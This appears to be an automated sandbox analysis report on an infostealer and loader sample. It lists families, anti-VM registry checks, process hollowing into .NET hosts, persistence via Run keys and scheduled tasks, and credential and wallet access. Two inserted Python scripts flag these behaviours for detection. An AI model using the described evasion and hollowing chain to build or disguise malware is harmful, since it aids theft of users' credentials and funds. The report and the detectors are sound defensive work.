Analysis Overview
SHA256
d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb
Threat Level: Known bad
The file d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb was found to be: Known bad.
Malicious Activity Summary
RisePro
Detects Monster Stealer.
Lumma Stealer
RedLine payload
Amadey
Exela Stealer
Monster
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Grants admin privileges
Modifies Windows Firewall
Blocklisted process makes network request
Downloads MZ/PE file
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Checks computer location settings
Identifies Wine through registry keys
Loads dropped DLL
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Power Settings
Checks installed software on the system
Looks up external IP address via web service
AutoIT Executable
Hide Artifacts: Hidden Files and Directories
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Program crash
Embeds OpenSSL
Unsigned PE
Collects information from the system
Suspicious use of SetWindowsHookEx
Gathers system information
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Runs net.exe
Suspicious use of SendNotifyMessage
Views/modifies file attributes
Gathers network information
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-18 12:27
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 12:27
Reported
2024-06-18 12:30
Platform
win10v2004-20240611-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Detects Monster Stealer.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Exela Stealer
Lumma Stealer
Monster
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
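The three signatures above (VirtualBox ACPI table name `VBOX__`, SystemBiosVersion/VideoBiosVersion strings, and the `Software\Wine` key) are the classic registry-based checks a loader runs before unpacking its real payload, and every dropped stage here (axplong.exe, explortu.exe, 5abc5821d6.exe and the parent sample) performs all three. The script below is an added example and not part of the report or of any of the listed malware families: it reads rows in this report's own table format, maps each registry path to a probe category, and flags processes that combine two or more categories, which separates evasion logic from the ordinary single BIOS lookups that software such as chrome.exe makes (the report's own "Enumerates system info in registry" rows). The sample rows are a constructed subset of this report plus two made-up benign rows; the extra VMware/VirtualBox paths beyond the three the run touched are an assumption added for coverage. One caveat for reuse on a live host: Sysmon records registry key and value creation/modification, not reads, so this signal needs a sandbox or EDR feed that logs key opens and value queries.

```python
import re
from collections import defaultdict

# Registry paths that analysis-evasion code probes, matched case-insensitively
# as substrings. The first three groups are exactly what this run touched; the
# remaining groups are additional well-known VirtualBox/VMware artifacts added
# here for broader coverage (an assumption of this example, not something the
# report shows).
PROBES = {
    "virtualbox_acpi": [
        r"\HARDWARE\ACPI\DSDT\VBOX__",
        r"\HARDWARE\ACPI\FADT\VBOX__",
        r"\HARDWARE\ACPI\RSDT\VBOX__",
    ],
    "bios_strings": [
        r"\HARDWARE\DESCRIPTION\System\SystemBiosVersion",
        r"\HARDWARE\DESCRIPTION\System\VideoBiosVersion",
    ],
    "wine": [r"\Software\Wine"],
    "vbox_guest_additions": [r"\SOFTWARE\Oracle\VirtualBox Guest Additions"],
    "vmware_tools": [r"\SOFTWARE\VMware, Inc.\VMware Tools"],
    "vbox_services": [r"\Services\VBoxGuest", r"\Services\VBoxService", r"\Services\VBoxSF"],
}

# One report row: "| <action> | <registry path> | <process image> | <target> |"
ROW = re.compile(r"^\|\s*(?P<action>[^|]+?)\s*\|\s*(?P<path>[^|]+?)\s*\|\s*(?P<process>[^|]+?)\s*\|")

# Constructed sample: rows copied from this report plus two made-up rows
# (chrome.exe, svchost.exe) that must not be flagged.
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\System32\svchost.exe | N/A |
"""


def parse_rows(text):
    """Yield (action, registry_path, process) for every data row in the text."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m and m["action"] != "Description":
            yield m["action"], m["path"], m["process"]


def classify(path):
    """Return the probe category a registry path belongs to, or None."""
    p = path.lower()
    for category, needles in PROBES.items():
        if any(n.lower() in p for n in needles):
            return category
    return None


def score_processes(rows):
    """Map each process image to the sorted list of probe categories it hit."""
    hits = defaultdict(set)
    for _action, path, process in rows:
        category = classify(path)
        if category:
            hits[process].add(category)
    return {process: sorted(cats) for process, cats in hits.items()}


def suspicious(scores, min_categories=2):
    """Processes that combined at least `min_categories` distinct probe types."""
    return sorted(p for p, cats in scores.items() if len(cats) >= min_categories)


if __name__ == "__main__":
    scores = score_processes(parse_rows(SAMPLE_ROWS))
    for process in suspicious(scores):
        print(f"{process}: {', '.join(scores[process])}")
```

The two-category threshold is deliberate: one BIOS or ACPI read is common in legitimate software, but a single image that checks the hypervisor ACPI table, the BIOS version strings and Wine in the first seconds of execution is almost always deciding whether to detonate.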
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b22e0b08f0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\b22e0b08f0.exe" | C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\wincfg.exe | C:\Windows\system32\winsvc.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\.co3BCC.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe | N/A |
| File opened for modification | C:\Windows\system32\winsvc.exe | C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\winnet.exe | C:\Windows\system32\winsvc.exe | N/A |
| File opened for modification | C:\Windows\system32\.co3BCC.tmp | C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4432 set thread context of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4568 set thread context of 504 | N/A | C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3456 set thread context of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 3900 set thread context of 4944 | N/A | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
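Each row above is the tell-tale shape of process hollowing: an unsigned stage dropped under `%TEMP%` (upd.exe, gold.exe, drivermanager.exe, legs.exe) sets the thread context of a signed Microsoft .NET host it has just spawned (RegAsm.exe, MSBuild.exe), so the stealer payload runs under a trusted image name. The script below is an added example, not code from the report or from any of the named families: it parses these rows, checks whether the source image lives in a user-writable directory and whether the target is one of the .NET hosts that commodity loaders habitually hollow, and assigns a severity. The list of host binaries and the directory markers are assumptions of the example drawn from widely published hunting rules; the last two sample rows are constructed to show the lower severities.

```python
import re
from pathlib import PureWindowsPath

# Signed Microsoft .NET host binaries that commodity loaders routinely hollow:
# start one suspended, write the payload in, redirect its main thread with
# SetThreadContext. Assumption of this example, not taken from the report.
HOLLOW_TARGETS = {
    "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
    "applaunch.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe",
}

# Directory markers a standard user can write to; a source image living here
# has no legitimate reason to rewrite thread state in another process.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                 "\\programdata\\", "\\users\\public\\")

SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2}

# One report row: "| PID <src> set thread context of <dst> | N/A | <src image> | <dst image> |"
ROW = re.compile(
    r"^\|\s*PID\s+(?P<src>\d+)\s+set thread context of\s+(?P<dst>\d+)\s*\|"
    r"[^|]*\|\s*(?P<src_img>[^|]+?)\s*\|\s*(?P<dst_img>[^|]+?)\s*\|"
)

# Constructed sample: the four rows from this report followed by two made-up
# rows (a debugger attaching to its own app; a Program Files tool targeting
# RegAsm.exe) that should not score "high".
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| PID 4432 set thread context of 2408 | N/A | C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4568 set thread context of 504 | N/A | C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3456 set thread context of 2440 | N/A | C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 3900 set thread context of 4944 | N/A | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1200 set thread context of 1201 | N/A | C:\Program Files\Debugger\dbg.exe | C:\Program Files\App\app.exe |
| PID 1300 set thread context of 1301 | N/A | C:\Program Files\Tool\launcher.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
"""


def parse_set_thread_context(text):
    """Return one dict per SetThreadContext row, in document order."""
    events = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            events.append({
                "src_pid": int(m["src"]), "dst_pid": int(m["dst"]),
                "src_img": m["src_img"], "dst_img": m["dst_img"],
            })
    return events


def in_user_writable(path):
    """True when the image path sits under a directory a standard user can write."""
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def assess(event):
    """Return (severity, reason) for one cross-process SetThreadContext call."""
    target = PureWindowsPath(event["dst_img"]).name.lower()
    hollow_host = target in HOLLOW_TARGETS
    untrusted_src = in_user_writable(event["src_img"])
    who = f"{event['src_img']} (PID {event['src_pid']}) -> {target} (PID {event['dst_pid']})"
    if hollow_host and untrusted_src:
        return "high", f"user-writable image redirected a thread in a commonly hollowed .NET host: {who}"
    if hollow_host:
        return "medium", f"commonly hollowed .NET host targeted from a trusted path: {who}"
    if untrusted_src:
        return "medium", f"user-writable image manipulated another process's thread: {who}"
    return "low", f"cross-process SetThreadContext between trusted images: {who}"


def triage(text):
    """Parse and assess every row, most severe first (stable within a level)."""
    findings = [(*assess(ev), ev) for ev in parse_set_thread_context(text)]
    return sorted(findings, key=lambda f: SEVERITY_ORDER[f[0]])


if __name__ == "__main__":
    for severity, reason, _event in triage(SAMPLE_ROWS):
        print(f"[{severity}] {reason}")
```

On an EDR this same logic maps onto thread-access telemetry (Sysmon Event ID 8/10 or the vendor equivalent) keyed on the target thread's process image; the "Program crash" row later in this report (WerFault.exe for legs.exe) is the kind of side effect a failed hollowing attempt leaves behind.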
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe | N/A |
| File created | C:\Windows\Tasks\explortu.job | C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\1000015002\5abc5821d6.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe |
Collects information from the system
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
